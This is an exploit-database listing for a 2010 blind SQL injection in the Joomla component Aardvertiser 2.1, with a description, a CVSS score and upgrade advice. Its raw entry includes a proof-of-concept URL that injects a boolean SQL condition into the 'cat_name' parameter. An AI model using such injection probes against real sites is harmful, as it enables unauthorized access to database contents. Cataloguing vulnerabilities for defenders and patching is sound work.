header-logo
Suggest Exploit
vendor:
Aardvertiser
by:
Stephan Sattler
8,5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Aardvertiser
Affected Version From: 2.1
Affected Version To: 2.1
Patch Exists: Yes
Related CWE: N/A
CPE: a:aardvertiser:aardvertiser:2.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2010

Joomla Component Aardvertiser 2.1 free Blind SQL Injection Vulnerability

A vulnerability exists in Joomla Component Aardvertiser 2.1 free, which allows an attacker to inject malicious SQL queries via the 'cat_name' parameter in the 'index.php' script. An attacker can exploit this vulnerability to gain access to sensitive information from the database.

Mitigation:

Upgrade to the latest version of the Joomla Component Aardvertiser.
Source

Exploit-DB raw data:

# Exploit Title: Joomla Component Aardvertiser 2.1 free Blind SQL Injection Vulnerability
# Date: 07.09.2010
# Author: Stephan Sattler // www.solidmedia.de
# Software Link: http://sourceforge.net/projects/aardvertiser/files/com_aardvertiser%20V2.1.1%20Free/com_aardvertiserfree.zip/download
# Version: 2.1 free


[ Vulnerability//PoC ]

http://server/joomlapath/index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view

Navigation

Suggest Exploit

Services By CQR